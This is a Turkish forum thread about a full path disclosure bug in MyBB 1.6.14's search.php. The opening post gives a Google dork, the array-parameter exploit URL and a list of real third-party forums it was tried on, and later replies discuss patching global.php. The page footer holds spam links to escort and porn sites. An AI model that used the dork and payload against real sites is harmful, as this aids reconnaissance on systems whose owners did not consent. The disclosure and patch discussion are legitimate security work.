MyBBDepo - Türkiyenin MyBB Deposu Forumuna Hoşgeldiniz
Eğer sitemize yaptığınız ilk ziyaretiniz ise, lütfen öncelikle Forum Kurallarını okuyunuz. Forumumuzda bilgi alışverişinde bulunabilmeniz için Kayıt olmalısınız. Üye olmayanlar forumumuzdan yararlanamazlar.
Eğer zaten kayıtlı kullanıcı iseniz, lütfen kullanıcı adınız ve şifreniz ile, Giriş yapınız. (Sitemize üyelik ücretsizdir).
DemoLisH avatar
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

Derecelendirme: 0/5 - 0 oy

MyBB 1.6.14 - search.php Full Path Disclosure


Sponsor Reklam

Çevrimdışı DemoLisH
 Tarih: 29-07-2014, Saat:15:05
(Son Düzenleme: 01-08-2014, Saat:15:09, Düzenleyen: DemoLisH.)
#1
Açık bana aittir arkadaşlar. MyBB yetkililerine bildirdiğimde cevapları şu oldu " It's just a bug, a low priority one, and one we've known about for a long time. " Gülümseme

http://cxsecurity.com/issue/WLB-2014070152

Kod:
# Title: MyBB 1.6.14 - search.php Bug
# Google Dork: inurl:"search.php" intext:"Powered By MyBB"
# Date: 26.07.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.14 - Latest Version
# Contact: [email protected]

***************************************************

[~#~] Exploit:
search.php?action[$victor]=getdaily

[~#~] Demo:
http://community.mybb.com/search.php?action[$victor]=getdaily

[~#~] Error:
Warning [2] Illegal offset type in isset or empty - Line: 239 - File: global.php PHP 5.4.28-1~dotdeb.1 (Linux)

[~#~] Example:
http://my-bb.ir/search.php?action[$victor=getdaily
http://www.mybb.fr/search.php?action[$victor]=getdaily
http://community.mybb.vn/search.php?action[$victor]=getdaily
http://destek.mybb.com.tr/search.php?action[$victor]=getdaily
http://www.mybb.biz/search.php?action[$victor]=getdaily
http://mybb.co.il/forum/search.php?action[$victor]=getdaily

***************************************************

[~#~] Thanks To:
ynR !, T3kfurD4GLi, X-X-X, PoseidonKairos, Mugair and all TurkeySecurity.Org & B3yaz.Org Members.
Cevapla
Bunu Beğenenler: mucotr , Manager
Sponsor Reklam
Sponsor Reklam Sponsor Reklam

Çevrimdışı xpserkan
 Tarih: 29-07-2014, Saat:15:31
#2
Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.
Cevapla
Bunu Beğenenler:

Çevrimdışı DemoLisH
 Tarih: 29-07-2014, Saat:17:37
#3
(29-07-2014, Saat:15:31)xpserkan Adlı Kullanıcıdan Alıntı: Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.

Hocam onu bende farkettim ama itibar kaybetmemeleri için bildirdim insan bi teşekkür ederdi sanırım herkez Türkler kadar nazik olamıyor Gülümseme
Cevapla
Bunu Beğenenler:

Çevrimdışı EmreKarakaya
 Tarih: 29-07-2014, Saat:18:17
#4
Bildirim için teşekkürler.Bu sıralar Mybb de Search.php dosyası fazla buglu gibi
Cevapla
Bunu Beğenenler:

Çevrimdışı xpserkan
 Tarih: 29-07-2014, Saat:19:20
#5
(29-07-2014, Saat:17:37)DemoLisH Adlı Kullanıcıdan Alıntı:
(29-07-2014, Saat:15:31)xpserkan Adlı Kullanıcıdan Alıntı: Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.

Hocam onu bende farkettim ama itibar kaybetmemeleri için bildirdim insan bi teşekkür ederdi sanırım herkez Türkler kadar nazik olamıyor Gülümseme

Eskiye dayalı yaşanan olaylardan dolayı Türkleri pek sevmiyorlar desek doğru olacaktır. Bize karşı güven ve sevgileri geçmişten dolayı kırılıp yok oldu malesef. Bazı şeyleri hak verip kabullenmek lazım.
Cevapla
Bunu Beğenenler:

Çevrimdışı usameavci
 Tarih: 29-07-2014, Saat:22:09
#6
Nedense bildirilen bugların hepsi dizi hatası Gülümseme Get ile gelen değerlerin hepsini is_array() methodundan geçirmek bu kadar mı zor diyesim var, ama demiyorum. Umarım şu ufak tefek kontrol hatalarını giderirler de bu tr konular açılmaz artık Melek - Masum
Cevapla
Bunu Beğenenler:

İzinli devmybb
 Tarih: 30-07-2014, Saat:00:54
(Son Düzenleme: 30-07-2014, Saat:15:45, Düzenleyen: devmybb.)
#7
İçerik temizlendi..
Cevapla
Bunu Beğenenler: mucotr

Çevrimdışı xpserkan
 Tarih: 30-07-2014, Saat:04:27
#8
(30-07-2014, Saat:00:54)devmybb Adlı Kullanıcıdan Alıntı: Bu hatalar önemli olmadığından 1.6x versiyonlarda düzeltme yoluna gitmiyorlar. Bu hataların hiç biri 1.8 de yok.

Hatayı ortadan kaldırmak isteyenler global.php içinden hata veren satırı değiştirince hatayı önlemiş olurlar.
Bul: Satır 229
Kod:
$stylesheet_actions[] = $mybb->input['action'];

Değiştir:
Kod:
$stylesheet_actions[] = $mybb->get_input('action');

Hocam hatayı bu şekilde giderince üye profilleri açılmıyor. Sanırım siz 1.8 global.php dosyasına bakarak bu kodu verdiniz fakat, sadece global.php ile düzenleme yaparak bu sorun giderilmiyor.

1.8 .php dosyalarındaki Kodlara baktığımız zaman, search.php ve inc/functions_search.php dosyalarında da işlem yapılması gerektiğini görüyorum.
Cevapla
Bunu Beğenenler:

 


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
Resim Mybb sitem Spam gönderiyor. mikail13 1 1,966 27-09-2020, Saat:22:28
Son Yorum: SiberLeon
  [1.6 - 1.8] Mybb iosec nasıl kurulur Akrep12 3 4,309 14-05-2018, Saat:15:16
Son Yorum: CyberPatient
  [1.8] MyBB 1.8 Forum Görüntülemede Admin Paneli Kısayolunu Gizlemek (Ders) Machine 9 14,055 27-04-2017, Saat:23:19
Son Yorum: VenomBoss
  Mybb Üyelikte Özel Karakter Çözümü (Eklentisiz) Legans 18 16,251 13-04-2017, Saat:19:36
Son Yorum: VenomBoss
  MyBB Admin Paneli IP Adresi Güvenliği / Yüksek Derecede Güvenlik Önlemi TheExpert 6 6,643 23-01-2017, Saat:21:20
Son Yorum: VenomBoss



Konuyu Okuyanlar: 1 Ziyaretçi

istanbul escort - mecidiyeköy escort - şişli escort - ataköy escort - taksim escort - escort mecidiyeköy

sex hikaye - porno izle - türk ifşa - mecidiyeköy escort - seks hikaye - türk porno - escort bayan